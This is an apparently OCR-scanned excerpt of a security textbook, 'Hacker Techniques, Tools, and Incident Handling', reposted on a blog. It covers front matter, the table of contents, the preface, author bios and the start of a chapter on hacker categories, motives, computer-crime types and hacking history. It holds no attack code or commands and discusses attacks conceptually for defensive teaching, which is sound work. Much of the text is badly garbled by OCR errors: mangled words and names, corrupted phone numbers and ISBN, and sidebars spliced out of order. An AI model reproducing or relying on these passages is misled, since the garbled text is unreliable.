Never Ending Security

It starts all here

Hacker Techniques, Tools And Incident Handling – Jones And Bartlett Learning

https://ia802303.us.archive.org/13/items/HackerTechniquesAndTools/Hacker%20techniques%20and%20tools.pdf

JONE-fi & BARTLETT LEARNING

INFORMATION SYSTEMS SECURITY 3 ASSURANCE SERIES

Hacker Techniques,
Tools, and Incident/
Handling /

StAN-PHILIPDRtYAMO AND MlCHAEt GREGG

Janes & Bartlett Learning

International
Sarb House, Barb Mews
London W6 7 PA
United Kingdom

Jones a Bartlett Learning Jones Si Bartlett Learning Canada

40 Ta It Pin e Drive 6339 Orm i nd a le Wa y

S udbury, MA D1 776 Mississauga, Ontario LBV 1J2

info@jblearning.com

www. ibis a rning.com

Jones & Bartlett Learning books and products a re availa bEa through most bookstores and online booksellers. To contact Jones & Bartlett
Learning directly, call 300′ 333 -003 4, fa* 973 443 3000, or visit our webs ita, http://www.jblearning.com.

Substantial discounts on bulk quantities of Jones & Bartlett Learning publications are available to tofporar ens, professional
associations, and other qualified! organizations. For details and specific discount information, contact the special sales department
at Jones & Bartlett Learning via the above contact information or send an email to specialsales@jblearning.com.

Copyright® 2D 11 by Jones & Barllc ll Learning, LLC

All rights reserved. No part of the material protected by this copyright may be reproduced or utilized in any form, electronic or mechanical,
including photocopying, recording, or by any information storage and retrieval system, without written permission from the copyright owner.

This publication is designed to provide accurate and authoritative information in regard to the subject matter cohered. It is sold with the
understanding that the publisher is not engaged in rendering legal, accounting, or other professional service. If legal advice or other expert
assistance \s required, the service of a competent professional person should be sought

Pro due lion Credits

Chief Executive Officer: Ty Field

President. James Homer

5 VP. Chief Operating Officer: Don Jones, Jr.

SVP. Chief Technology Officer: Dean Fosse I la

SVP. Chief Marketing Officer: Alison M. Pendergast

SVP. Chief Financial Officer! Ruth Siporin

VP, Design and Production: Anne Spencer

VP, Manufacturing, and Inventory Control. Therese Connell

Editorial Management: High Stakes Writing. LLC, Ed to*’ and Publisher. Lawrence J. Goodrich

Reprints and Special Projects Manager: Susan Schultz

Associate Production Editor: Tina Chen

Director of Marketing: Alisha Weisman

Senior Marketing Manager: Andrea DeFronzo

Cover Design: Anne Spencer

Composition: Mia Saunders Design

Cover Image: © Handy Widiyanto/ShutterStock, Inc.

Chapter Opener Image:® Rodolfo Clix/Dra a mstime.com

Printing and Binding: M alloy. Inc.

Cover Printing: Ma Hoy, Inc.

IS 9 N 9704-7637-9183-*

6048

Printed in the United States of America
14 1312 11 10 10947 6 5 4321

Contents

Preface xifi
Acknowledgments xv

part one Hacker Techniques and Tools 1
Hacking: The Next Generation 2

Profiles of Hackers, Crackers, and Cybercrirninals 4

The Hacker Mindset 6
A Look Back at the History of Computer Hacking 9
Eth i cal H acki ng a nd Pe netrati o n Testi ng 1 2

The Role of Ethical Hacking 13
Common Hacking Methodologies 15
Performing a Penetration Test 1 7
The Role of the Law and Ethical Standards 1 9

CHAPTER SUMMARY 21

KEY CONCEPTS AND TERMS 21

CHAPTER 1 ASSESSMENT 22

TCP/IP Review 23

Exploring the OSl Reference Model 25

The Role of Protocols 25

Layer 1 ; Physical Layer 26

Layer 2: Data Link Layer 27

Layer 3: Network Layer 28

Layer 4; Transport Layer 28

Layer 5: Session Layer 29

Layer 6: Presentation layer 29

Layer 7 : Applies tion Layer 30

Mapping the OSl to Functions and Protocols 31

TCP/IP (A Layer-by-Layer Review) 32

Physi cal/Network Access Layer 3 3
Internetwork Layer 36
Host-to- Host Layer 42
Application Layer 44

Contents

CHAPTER SUMMARY 48

KEY CONCEPTS AND TERMS 48

CHAPTER 2 ASSESSMENT 49

CHAPTER 3

Cry ptog ra ph i c Con cepts 50

Cryptographic Basics 52
Cryptographic History 55

Sy m metric E ncrypti on 58

Asymmetric Encryption 61
Digital Signatures 65

Purpose of Public Key Infrastructure 66

The Role of Certificate Authorities (CAs)
PKI Attacks 71

Hashing 72

Common Cryptographic Systems 74
Cryptanalysis 75

CHAPTER SUMMARY 78

KEY CONCEPTS AND TERMS 79

CHAPTER 3 ASSESSMENT 79

69

CHAPTER 4

Physical Security 81

Basic Equipment Control 5 82

Hard Drive and Mobile Device Encryption
Fax Machines and Public Branch Exchanges
Voice over IP (VoIP) S6

Physical Area Controls 87

Fences 87
Gates 89
Bollards 90

Facility Controls 90

Doo rs, M an tra ps r and Turnstiles 91
Walls, Ceilings, and Floors 92
Windows 93
Guards and Dogs 93
Construction 94

Personal Safety Controls 94

Lighting 95

Alarms and Intrusion Detection 95
Closed-Circuit TV (CCW) 96

82

Contents

v

Physical Access Con trofs 97

Locks 97

Lock Picking 97

Tokens and Biometrics 98

Avoiding Common Threats to Physical Security 99

Natural, Human, and Technical Threats 99

Physical Keyloggers and Sniffers 100

Wireless Interception and Rogue Access Points 102

Defense in Depth 102

CHAPTER SUMMARY 103

KEY CONCEPTS AND TERMS 1 03

CHAPTER 4 ASSESSMENT 104

part two A Tech nical Overview of Hacking 1 05

CHAPTER 5

Footp rm ting Tools and Techniques 106

The Information-Gathering Process 107

The Information on a Company Web Site 1 08

Discovering Financial Information 112

Exploring Domain Information Leakage 117

Manual Registrar Query 117
Automatic Registrar Query 1 2 1
Whois 123
Nslookup 124

I nternet Assigned M u m bers Authority (I AN A) 1 24
Determining a Network Range 126

Tracking an Organization’s Employees 128

Exploiting Insecure Applications 132

Using Basic Countermeasures 1 32

CHAPTER SUMMARY 135

KEY CONCEPTS AND TERMS 1 35

CHAPTER 5 ASSESSMENT 136

CHAPTER 6

Port Scanning 137

Deter rn i n i ng the N etwo rk Range 138
I d enti fy i ng Active Machines 133

Wardiafing 139
Wardriving 140
Pinging 142
Port Scanning 142

Contents

CHAPTER 7

Mapping Open Ports 146

Nmap 146
Superscan 149
Scanrand 149
THC-Amap 1 50

OS Fingerprinting 1 BO

Active OS Fingerprinting 1 51
Passive OS Fingerprinting 1 53

Mapping the Network 1 54

Cheops 155
Solarwinds 155

Analyzing the Results 1 55

CHAPTER SUMMARY 157

KEY CONCEPTS AMD TERMS 157

CHAPTER 6 ASSESSMENT 15S

Enumeration and Computer System Hacking 159

Windows Basics 160

Controlling Access 161
Users 161
Groups 162
Security Identifiers 1 63

Commonly Attacked and Exploited Services 1 64

Enumeration 164

NULL Session 165
Working with Mbtstat 167
SuperScan 1 67
SNScan 169

System Hacking 169

Passive Online Attacks 1 70

Active Online Attacks 171
Offline Attacks 171

N o ntech n ica I Attacks 1 74

Privilege Escalation 175
Planting Backdoors 1 79

Using PsTools 1 80

Rootkits 180

Contents

Covering Tracks 182

Disabling Auditing 1 82
Data Hiding 183

CHAPTER SUMMARY 184

KEY CONCEPTS AND TERMS 184

CHAPTER 7 ASSESSMENT 185

NiUj^ll Wireless Vulnerabilities 186

The I mpo rta nee of Wi re le ss Security 1 8 7
Emanations 188

Common Su pport and Ava ilability 188

A Brief History of Wireless Technolog i es 1 89

802.11 190
802.11b 190
802.11a 190
802.11 g 191
802.11 n 191

Other Wire less Tech nol og ies 1 92
Wo rk i n g w ith an d Se-cu rin g Bluetooth 1 92

Bluetooth Security 193

Working with Wireless LANs 196

CSMA/CD Versus CSIvWCA 1 96

RoleofAPs 197

Service Set Ida ntifier (SS ID) 197

Associati on w ith a n AP 198

Th e I mp-o rtan ce of Authentication 1 98

Network Setup Options 1 98

Threats to Wireless LANs 199

Wardriving 199

Mis configured Security Settings 200
Unsecured Connections 200
Rogue APs 201
Promiscuous Clients 201
Wireless Network Viruses 202
Countermeasures 202

Wireless Hacking Tools 202

Netstumbler 201
inSSIDer 203

Protectin g Wi reless N et wo rks 205

Default AP Security 205
Placement 205
Emanations 205
Rogue APs 206

Use Protection for Transmitted Data 206
MAC Filtering 207

CHAPTER SUMMARY 207

KEY CONCEPTS AND TERMS 208

CHAPTER 8 ASSESSMENT 20fi

Web and Database Attacks 209

Attacking Web Serve rs 210

Categories of Risk 211

Vu Inerabil iti es of Web Servers 2 1 2

I rn p rope r o r Poor Web Des ign 212

Buffer Overflow 213

Denial of Service (DoS) Attack 213

Distributed Denial of Service (DDoS) Attack

Banner Information 214

Permissions 215

Error Messages 215

Unnecessa ry Features 2 1 5

User Accounts 216

Structured Query Language (SQL) Injections

Examining an SQL Injection 217

Vandalizi ng Web Servers 2 1 S

Input Validation 219
C ross^S ite Scripting (XS S) 219
An atomy of Web Applications 2 20
Insecure Logon Systems 221
Scripting Errors 222
Session Management Issues 223
E ncry ption Wea knesses 223

Database Vulnerabilities 224

A Look at Databases 225
Vulnerabilities 226
Locating Databases on the Network
Locating Vulnerabilities in Databases
0 ut of Sight, Out of Mind 229

CHAPTER SUMMARY 230
KEY CONCEPTS AMD TERMS 230
CHAPTER 9 ASSESSMENT 231

226
228
228

Contents

CHAPTER 10

Ma I ware, Worms, and Viruses

Ma I wa re 233

Mia I ware’s Legality 235
Types of Ma I ware 236
Ma I ware’s Targets 236

Viruses and How They Function 237

Viruses: A History 237
Types of Viruses 238
Prevention Techniques 241

Worms a nd How They Function 2 43

How Worms Work 2 44
Stopping Worms 245
The Power of Education 246
Antivirus and Firewalls 246

Spyware 246

Methods of Infection 247
B undl in g with Sof t wa re 2 48

Sea re ware 249

CHAPTER SUMMARY 250

KEY CONCEPTS AND TERMS 251

CHAPTER 10 ASSESSMENT 251

232

CHAPTER 11

Trojans and Backdoors 252

Si g n if ica nee of Troj ans 254

Methods to Get Troj ans onto a System

Targets of Troja n s 258

Known Symptoms of an Infection 2S9

Detect on of Troja ns a nd Viruses 2 59

Vulnerability Scanners 261
Antivirus 261

Trojan Tools 262

An In Depth Look at B02K 263
Distribution Methods 265

Using Wrappers to Install Trojans 265

Trojan Construction Kits 266

Backdoors 267

Covert Communication 268

The Role of Keyloggers 269

Software 270

Port Redirection 270

Software Protection 272

256

Contents

CHAPTER 12

CHAPTER SUMMARY 274

KEY CONCEPTS AND TERMS 274

CHAPTER 11 ASSESSMENT 275

Sniffers, Session Hijacking, and Denial of Service Attacks

Sniffers 277

Passive Sniffing 279
Active Sniffing 280
Sniffing Tools 284
What Can Be Sniffed? 284

Session Hijacking 285

Identifying an Active Session 2S6
Seizing Control of a Session 288
Session H ijack i ng Too Is 289
Thwarting Session Hijacking Attacks 289

Denial of Service [DoS) Attacks 289

Categories of DoS Attacks 290
Tools for DoS 292

D istributed Den ial of Service (DDoS) Attacks 293

Some Characteristics of DDoS Attacks 293
Tools for DDoS 295

Botnets 295

CHAPTER SUMMARY 297

KEY CONCEPTS AMD TERMS 297

CHAPTER 12 ASSESSMENT 298

CHAPTER 13

Linux, Live CDs, and Automated Assessment Tools

Linux 300

A Look at the Interface 302
Important Linux Directories 304

Users, Groups, and Special Accounts 304

Working with Permissions 305

Commonly Used Commands 307

Basic Command Structure 307

I pcfra ins and Iptabl es 309

Ipchains 309
IPtables 310

299

Contents

Live CDs 310

5 peci a I Pu rpose Li ve CDs 3 1 2
Trinity 312
Caine 313
Astaro 313

Damn Vulnerable Linux 313
Network Security Toolkit (NST) 313

Auto ma ted Assessm en t Too Is 314

So urce C ode Scanners 314
Application Level Scanners 31 5
System-Level Scanners 316

CHAPTER SUMMARY 317

KEY CONCEPTS AND TERMS 317

CHAPTER 13 ASSESSMENT 318

part three Incident Response and Defensive Technologies 319

Incident Response 320

What Is a Security Incident? 321

The Incident Response Process 322

Incident Response Policies, Procedures, and Guidelines 323
Phases of an Incident and Response 324
I ncf dent Response Team 324

Incident Response Plans (IRPs) 327

Th e Ro le of B us i ness Conti nuity Plans (8CPs) 32 7
Recovering Systems 330

Planning for Disaster and Recovery 332

Preparation and Staging of Testing Procedures 333
Frequency of Tests 334
Ana lys is of Test Res ults 334

Evidence h a ndling a nd Ad m i n istratio n 335

Evidence Collection Techniques 335

Security Reporting Options and Guidelines 339

Affected Party Legal Considerations 340

Requ i reme nts of Regulated i ndu str ies 34 1

Payment Card Industry Data Security Standard (PCI DSS) 341

CHAPTER SUMMARY

342

KEY CONCEPTS AND TERMS

343

CHAPTER 14 ASSESSMENT

343

Contents

De f en si v e Tec hno I og i es 344

Intrusion Detection Systems (IDSs) 345

IDS Components 349

Components of NIDS 350

Components of HIDS 352

Setting Goals 352

Accountability 353

Li mita tions of an IDS 353

Investigation of an Event 354

Analysis of Information Collected 354

Intrusion Prevention Systems (IPSs) 354

Trie Purpose of Firewalls 355

How Fi rewalls Work 3 56
Firewall Methodologies 356
Limitations of a Firewall 357
Implementing a Firewall 358
Authoring a Firewall Policy 360

Honeypots/Honeynets 362

Goals of Honeypots 363
Legal Issues 363

Role of Controls 364

Technical Controls 365
Physical Controls 367

CHAPTER SUMMARY 368

KEY CONCEPTS AND TERMS 369

CHAPTER 15 ASSESSMENT 369

APPENDIX A

APPENDIX B

Standard Acronyms 373
Glossary of Key Terms 375
References 383

Index 337

Preface

Purpose of This Book

This book is part of the Information Systems Security & Assurance Series from Jones
& Bartlett Learning ( w ww. jblea rn ing. co m } . Designed for courses and curriculums in
IT Security, Cybersecurity, Information Assurance, and information Systems Security,
this series features a comprehensive, consistent treatment of the most current thinking
and trends in this critical subject area. These titles deliver fundamental information-
security principles packed with real-world applications and examples. Authored by
f LTiiiied I n formation Sysiems Security I’roti-sslimnl.s (t’lSSl’sj. ihe\ deliver com prHiensk’e
information on all aspects of information security. Reviewed word for word by leading
technical (.’N pi’ i” 1 s in the field, these books are not jl:se cur rem. hul t”or\varti-i JTinkltiy,
putting you in the position to solve the cybersecurity challenges not just of today,
but of tomorrow, as well.

The first part of this book on information security examines the landscape, key terms,
and concepts that a security professional needs to know about hackers and computer
criminals who break into networks, steal information, and corrupt data. It covers the
history of hacking and the standards of ethical hacking. The second part examines the
technical overview of hacking: how attacks target networks and the methodology they
follow. It reviews the various methods attackers use, including footprinting, port scanning,
enumeration, ma I ware, sniffers, and denial of service. The third part reviews incident
response and defensive technologies: how to respond to hacking attacks and how to fend
them off, especially in an age of increased reliance on the Web.

Learning Features

The writing style of this book is practical and conversational. Each chapter begins with
a statement of learning objectives. Step-by-step examples of information security concepts
and procedures are presented throughout the text. Illustrations are used both to clarify
the material and to vary the presentation. The text is sprinkled with Notes, Tips, FYIs,
the subject under discussion. Chapter Assessments appear at the end of each chapter,
with solutions provided in the back of the book.

■ – ■

XIII

Preface

Chapter summaries are included in the text to provide a rapid review or preview of
the material and to help students understand the relative importance of the concepts
presented.

Audience

The materiel! is suitable tor undergraduate or graduate computer science majors or
in form at ion science majors, students at a two-year technical college or community college
who have a basic technical background, or readers who have a basic understanding
of IT security and want to expand their know led ye.

Acknowledgments

Thanks to Mom and Dad for all your help over the years.

Thanks to Heather for all your hard work and keeping me on task. Every author should
be so fortunate to have you helping them.

And Ei very special thanks to Jennifer. Thank you for your support mid encouni^ernent,
and for acting interested in the topics that this geek would yak about for too long. FN
always appreciate and love you more than words can express. Thanks for being the Zelda

St\u-i > }}\ l iip i > : J j r J i J i

XV

SEAN-PHILIP ORIYANO has been actively working in the IT field since 19 90. Throughout
his career, he hits held positions such as support specialist to consultants and senior
instructor, Currently, he is an IT instructor who specializes in infrastructure and security
topics for various public and private entities. Oriyano has instructed for the 11 S. Air Force.
Navy, and Army at locations both in North America and internationally. Sean is certified
as a CISSP, CHFI. CEH, GET. CNDA. SCNP. SCPI, MCT, MCSE, and MCITP, and he is a
member of the EC-Council ISSA. the Elearning Guild, and Infragard,

MICHAEL GREGG brings more than 20 years of experience building real security solutions
and driving strategic development. He is a cybersecurity expert focused on IT networks
and security assessments. His written works in J he iield of IT security include authoring
or coauthoring 14 security books. Some of these titles include: I hick the Stuck (Syngress):
Security Street Smarts (Sybex); CISSP Exam Cram 2, CISSP Exam Cram 2 Questions Edition,
and The Certified Ethical Hacker Exam Prep 2 (Que). He also authored Inside Network
Security Assessment (Sams Publishing), Ruild Your Own Network Security Lab (Wiley),
and The Certified Information Security Auditor ( CISA j Exam Prep (Que). Gregg holds two
tissue Lille’s decrees, a haehdurV decree, and master’s degree,

Hacker Techniques and Tools

chapter i Hacking: The Next Generation 2
CHAPTER 2 TCP/IP Review 23
CHAPTER 3 Cryptographic Concepts 50

chapter 4 Physical Security 81

Hacking: The Next Generation

THIS BOOK WILL COVER A WIDE RANGE of techniques and technologies
that hackers can use to compromise a system in one way or another
Before you go further, it is important to first understand what hackers
are and where they come from.

The first generation of hackers who emerged in the 1960s were individuals
who would be called “geeks” or technology enthusiasts today. These early
hackers would go on to create the foundation for technologies such as the
ARPANET which paved the way for the Internet. They also initiated many
early software-development movements that led to what is known today
as open source. Hacking was motivated by intellectual curiosity; causing
damage or stealing information was “against the rules” for this small
number of people.

In the 1980s, hackers started gaining more of the negative connotations
by which the public now identifies them. Movies such as War Games and
media attention started altering the image of a hacker from a technology
enthusiast to a computer criminal During this time period, hackers engaged
in activities such as theft of service by breaking into phone systems to make
free phone calls, The publishing of books such as The Cuckoo’s Egg and
the emergence of magazines such as Phrack cast even more negative light
on hackers. In many respects, the 1980s formed the basis for what a hacker
is today.

Over the past two decades, the definition of what a hacker is has evolved
dramatically from what was accepted in the 1980s and even the 1990s.
Current hackers defy easy classification and require categorization into
several groups to better match their respective goals. Here is a brief look at
each of the groups to better understand what the information technology
industry is dealing with:

1

• Script kiddies — These hackers occupy the lowest level of the hacker
hierarchy. They typically possess very basic skills and rely upon existing tools
that they can locate on the Internet These hackers are the beginners and
may or may not understand the impact of their actions in the larger scheme
of things. It is important, however, not to underestimate the damage these
individuals can cause; they can still do a great deal of harm.

White-hat hackers — These individuals know how hacking works and the
danger it poses, but use their skills for good. They adhere to an ethic of
“do no harm/’ White-hat hackers are sometimes also referred to as ethical
hackers, which is the name most widely known by the general public,

Gray-hat hackers — Hackers in this class are “rehabilitated” hackers or those
who once were on “the dark side/’ but are now reformed. For obvious
reasons, not all people will trust a gray-hat hacker

Black-hat hackers — A black-hat hacker has, through actions or stated
intent, indicated that his or her hacking is designed to break the law r disrupt
systems or businesses, or generate an illegal financial return. Hackers in this
class should be considered to be “up to no good/’ as the saying goes. They
may have an agenda or no agenda at alL In most cases, black-hat hackers
and outright criminal activity are not too far removed from one another

The purpose of this book is to teach you how to ensure the security of computers
and networks by learning and understanding the mindset of individuals out to
compromise those systems. To defend information technology assets, you need
to understand the motivations, tools, and techniques that attackers commonly use,

Chapter 1 Topics

This chapter covers the following topics and concepts:

What the profiles of hackers, crackers, and cybef criminals are

• What a look back at the history of computer hacking shows
• What ethical hacking and penetration testing are
What common hacking methodologies are

■ How to perform a penetration test

• What the roles of ethical standards and the law are

3

Chapter 1 Goals

When you complete this chapter, you will be able to:

• Describe the history of hacking

• Explain the evolution of hacking

• Explain why information systems and people are vulnerable to manipulation

• Differentiate between hacking, ethical hacking, penetration testing, and auditing

• Relate the motivations, skill sets, and primary attack tools used by hackers

• Compare the steps and phases of a hacking attack to those of a penetration test

• Explain the difference in risk between inside and outside threats and attacks

• Review the need for ethical hackers

• State the most important step in ethical hacking

• Identify important laws that relate to hacking

Profiles of Hackers, Crackers, and Cybercriminals

In today’s world, organizations have quickly Learned that they can no Longer afford to
muleiTsljmatL? or ignore the Eh rem al NiduTH pose. Origan mi Lams of till sizes hiwc Jeanied
to reduce threats through a combination of technological, ad in in is t rati ve h and physical
measures designed to address a specific range of problems. Technological measures include
devices and techniques such as virtual private networks l VPN si. cryptographic protocols,
intrusion detection systems (IDS), intrusion prevention systems (IPS), access control
lists ( ACLs), biometrics, smart cards, and other devices. Administrative controls include

H ™ U

People who break the law or break into systems without authorization are more correctly known
as “crackers.'” The press does not usually make this distinction, because- “hacker” has become
such a universal term. However, there are many experienced hackers who never break the law r
and who define hacking as producing an outcome the system designer never anticipated. In that
respect, Albert Einstein can be considered to have “hacked” Newtonian physics. In the interest
of simplicity this book will use the term “hacker” to describe those who are either good or evil.
No offense is intended to either group.

CHAPTER 1 Hacking: The Next Generation

5

pi. iJ ides, procedures, and olber rules. Physical measures
include devices such as cable locks, dei r ice locks, alarm systems,
and other similar devices. Keep in mind that each of these
devices, even if expensive, can be cheaper and more effective
than cleaning up the aftermath of an intrusion.

While discussing attacks and attackers, security professionals
must be thorough in assessment and evaluation of the threat
by also considering where it comes from. When evaluating
the threats against an organization and possible sources of
attack, always consider the fact that attackers can come from
both outside and inside the organization. A single disgruntled
employee can cause tremendous amounts of damage because
he or she is an approved user of the system. In just about any
given situalion, Lhe attacks originating fro in fiutsuii 1 the firewall
will greatly outnumber the attacks that originate from the inside.
However, an insider may go unnoticed longer and also have
some level of knowledge of how things work ahead of time,
which can result in a more effective attack.

Because the risk to any organization is very real, it is up to
each organization to determine the controls that will be most
effective in reducing or mitigating the threats it faces. When
considering controls, you can examine something called the TAP
principle of controls, TAP is an acronym for technical, adminis-
trative, and physical!, the three types of controls you can use in
risk mitigation. Here’s a look at each type with a few examples:

• Technical — Technical controls take the form of software or hardware
such as iire walls, proxies, intrusion detection systems (IDS), intrusion
prevention systems (IPS), biomclrie authentication, permissions, auditing,
and sim ilar technologies.
procedures. An example is a password policy that defines what makes a good
requirements, such as policies that dictate privacy of customer information.
Other examples of administrative policy include the rules governing the
hiring and firing of employees.

• Physical — Physical controls are those that protect assets from traditional
threats such as theft or vandalism. Mechanisms in this category include
locks, cameras, guards, lighting, fences, gates, and other similar devices,

• NOTE

Never underestimate the damage
a determined individual can do
to computer systems, For example,
Michael Cake,, commonly known
as MafiaBoy, was an individual
who In February 2000 launched
a series of denial of service (Do 5)
attacks that were responsible
for causing damages estimated
upwards of $1 .2 bit! ion. NOTE Both insiders and outsiders rely on exploits of some type. Remember that an exploit refers to a piece of software, a toolj or a technique that targets or takes advantage of a vulnerability — leading to privilege escalation, toss of integrity, or denial of service on a computer system. 6 PA RT 1 H ac ke r Techn iq ties and Too I s The Hacker Mindset NOTE Like many criminals, black -hat hackers do not consider their activities to be illegal or even morally wrong. Depending on whom you ask, you can get a wide range of responses from hackers on how they view [heir actions. It Ik also not unhenrd of for hackers or criminals to have a code of ethics that they hold sacred, but seem more than a little skewed to others. In defense of their actions, hackers have been known to cite all sorts of reasons, including the following: Although it is true that the mere act of writing a computer virus is not illegal, releasing it into the “wild” is illegal. NOTE Although it is true that applications or data can be erased or modified, worse scenarios can happen under the right circumstances. For example, consider what could happen if someone broke into a system such as a 911 emergency service and then maliciously or accidentally took it down. • The no -ha r m – was-d one fallacy — If one enters a system, even in an unauthorized manner it is OK as long as nothing is stolen or damaged in the process. The computer game fallacy — If the computer or system did not take any action or have any mechanism to stop the attack, it must be OK. • The law-abiding citizen fallacy — Writing a virus is not illegal, so it must be OK. The shatterproof fallacy — Computers cannot do any real harm. The worst that can happen is a deleted file or erased program . • The candy- from- a -baby fallacy — If it is so easy to copy a program or download a song, how can it be illegal/ • The hacker fallacy — Information should be free. No one should have to pay for books or media. Everyone should have free access. • Another example of attempting to explain the ethics applied to hackers is known as the hacker ethic. This set of standards dates to Steven Levy in the 1960s, In the preface of his book, Hackers: Heroes of the Computer Revolution, Levy stated the following: ■ Access to computers and anything that might teach you something about the way the world works should be unlimited and total. • All information should be free. • Authority should be mistrusted, and decentralization should be promoted, • Hackers should be judged by their hacking, not criteria such as degrees, age, race, gender h or position, • You can create art and beauty on a computer, L’omputerfi can change your life for the better. CHAPTER 1 Hacking: The Next Generation !■ lilies are an important component in understanding what makes a hacker, but far from the only component. One must also consider motivation. Anyone who has watched ei police drain a or is a fan of detective stones knows that there are three things needed to commit a crime: • Mea ns — Doe s the attacker pos sess the ability to commit the crime in q uestio n ? ■ Motive — Does the attacker have a reason to engage in the commission of the crime? Opportunity — Does the attacker have the necessary access and time to commit 1 he crime? Focusing on the second point — motive — helps better understand why an attacker might engage in hacking activities. The early “pioneers” of hacking engaged in those activities out of curiosity. Today’s hackers can have any number of motives, many of which are similar to those for traditional crimes: • Monetary — Attacks committed with the Intention of reaping financial gains. Status — A t tacks com m i 1 1 ed w i t h th e in te a tio n o f ga i ni n g r ec ogn it io n a n d , by extension, increased credibility within a given group (for example, a hacking group). • Terrorism — Attacks designed to scare, intimidate, or otherwise cause panic in the victim or target group. Revenge or grudge — Attacks conceived and carried out by individuals who are angry at an organization. Attacks of this nature Eire often launched by disgruntled employees or customers, Hacktivism — Attacks that are carried out to bring attention to a cause, group, or political ideology. • Fun — A ttacks that are launched with no specific goal in mind other than to just carrv out an attack. These attacks can he indiscriminate in their execution. No matter what the hackers’ motivations are, any of them might result in the commission of a computer-based crime. Tor example, attackers may htiek a game server to boost their stats in an online game against their friends, but they still have entered a server without authorization, Hacktivism A relatively new form of hacking is the idea of hacking in behalf of a cause. In the past r hacking was done for a range of different reasons that rarely included social expression. Over the past decade, however, there have been an increasing number of security incidents with roots in social or political activism. Examples include defacing Web sites of public officials, candidates, or agencies that an individual or group disagrees with, or performing DoS attacks against corporate Web sites. PART 1 Hacker Techniques and Tools A sampling of common attacks that lit the definition of computer crime include the following: Theft of access — Stealing, pels swords, stealing usernames, and subverting access mechanisms to bypass normal authentication. In a number of situations, the very act of possessing stolen credentials such as passwords may be enough to bring formal charges. Network intrusions — Accessing a system of computers without authorization. Intrusions may not even involve hacking tools; the very act of logging into a guest account may be sufficient to be considered an intrusion. Emanation eavesdropping — Smiling devices for intercepting radio frequency IRF) signals gen untied by computers or terminals. Years ago. I he U.S. Depart men! of Defense established a classified program codenamed TEMPEST that was designed to shield or suppress electronic emanations to protect sensitive and classified government information. • Social engineering — Basically, telling lies to manipulate people into divulging information they otherwise would not provide. Information such as passwords. PINs (personal identification numbers ), or other delaiis can be used to attack computer-based systems. Although not necessarily a crime in every specific situation, social engineering methods such as pretexting (tricking an individual to reveal information under false pretenses) are often Illegal. • Posting and/or transmitting illegal material— Distributing pornography to minors is illegal in numerous jurisdictions, as is possessing or distributing child pornography. • Fraud — Intentional deception designed to produce illegal financial gain or to damage another party. Software piracy — The possession, duplication, or distribution of software in violation of a license agreement, or the act of removing copy protection or other license-enforcing mechanisms. Dump ste r d i vi n g — G a th ering m a teri a I th a t h a s bee n di sc arded or I eft in u nse c u red or unguarded receptacles. Dumpster diving often enables discarded data to be pieced loueiJuT to reeonsinm setiMLiu 1 inJurmiU ion. • Malicious code — Software written with a de liber ate purpose to cause damage* destruc- tion, or disruption. Examples Include viruses, worms, spy ware, and Trojan horses. Denial of service (DoS) and distributed denial of service (DDoS) attacks — Overloading a system’s resources so it cannot provide the required services. Both DoS and DDoS have the same effect, except thai distributed denial of service (DDoS) is launched from large numbers of hosts that have been compromised and act after receiving a particular command. IP address spoofing — Substituting a forged IP address for a valid address in network traffic or a message to disguise the true location of the message or person. This attack method may a 1st? be used as a component of other larger Eit tacks such as DoS or DDoS attacks. CHAPTER 1 Hacking: The Next Generation Unauthorized destruction or alteration of information — Modifying, destroying, or tampering with information wilbonl appropriate permission. This can involve manual or automated tools that have been developed for this purpose In change information til rest or in motion, • Embezzlement — A form of financial fraud that involves theft or redirection of funds as a result of violating a position of trust, • Data-diddling — The unauthorized modification of data used to forge or counterfeit information. Examples include changing performance review marks, adjusting expense account limits, or “tweaking” reports after the fact. ■ Logic bomb — A piece of code designed to cause harm, a logic bomb is intentionally inserted into a software system and will activate upon the occurrence of some predetermined data, time, or event. A Look B ack at th e Histor y of Compute r Hacking Typical early hackers were technology enthusiasts who were curious ah out the new technology of networks and computers and wanted to see just how far they could push its capabilities. In the decades since, hacking has changed quite a bit — getting more advanced and cleverer as the technology advanced. For example, in the 1970s* when mainframes were more common in corporate and university environments, hacking was mostly confined to those systems. The 1980s saw the emergence of personal computers (PCs), which meant every user had a copy of an operating system. As these systems were very similar, a hack that worked on one machine would work on nearly every other PC as welL Although the first Internet worm in November 1988 exploited a weakness in the UNIX sendmai I command, worm and virus writers moved their attention to the world of PCs, where most infections occur today. As h tickers evolved so did their attacks as their skills and creativity increased. The lirst World Wide Web browser. Mosaic, was introduced in 199 3. By 199 5, hackers began defacing Web sites. Some of the earliest hacks were quite funny, if not somewhat offensive or vulgar. In August 199 5. hackers hacked The MCSM Web site for the movie “T I ackers” suggesting readers attend the DEFCON hacker conference instead, A 1996 hack of the Department of justice Web site replaced Attorney General Janet Reno’s picture with I hat of Adolf Hitler. The next month, hackers defaced the CIA Web site, and later that year the Air Force Web site featured a link to Area 51 , a secret government site in Nevada, long linked in the popular mind to IJFOs. By May 2001 , Web sites were being hacked at such a rate that the group that documented them gave up trying to keep track (see htip’Jl a ttri tion.G rg/m ir ror/attrit ion / } , By the turn of the century, hacks started to progress from pranks to maliciousness. DoS attacks took out companies 1 Internet access, affecting stock prices and causing fin a nciul damage. As \ eh ^Lles heiian to process more credit cEird transactions, their back-end databases became prime targets for attacks. As computer-crime laws came into being, the bragging rights for hacking a Web site became less attractive — sure, a hcicker could show off to friends, but that didn’t produce a financial return. PA RT 1 Hacker Techniques and Tools Willi online commerce,, skills stEirted going to the highest bidder, with crime rings, organized crime, and nations with hostile interests utilizing the Internet as an attack route. Numerous products emerged in the 1990s and early 2000s — antivirus, firewalls, intrusion detection systems, and remote access controls — each designed to counter an increasing number of new and diverse threats. As technology, hackers, and counter measures improved and evolved, so did the types of attacks and strategies that initially spawned them. As is true in the security field and the technology field as a whole, new developments move rapidly, and old defensive measures lose l heir effect iv eness n> lime inarches on, Attackers sinned introducing new threats in the form of worms, spam, spy ware, ad ware, and rootkits. These attacks went beyond harassing and irritating the public: they also caused widespread disruptions by attacking the technologies that society increasingly depended on. II tickers also started to realize that it was possible to use their skills to generate money in all sorts of interesting ways. For example, attackers have used techniques to redirect Web browsers to specific pages that generate revenue for themselves. Another example is a spammer sending out thousands upon thousands of e-mail messages that advertise a product or service. Because sending out bulk e-mail costs mere pennies, it takes only a small number of purchasers to make a nice profit Keep in mind that in the security iield. there is an ongoing battle between attacker and defender to establish dominance. Attackers change their tactics in an effort to keep their attacks as fresh and effective as possible, while defenders improve and adapt their defenses U’ counter ibe nllacks as we\ as anticipate and lire. ; i r l new ones. Over the past few 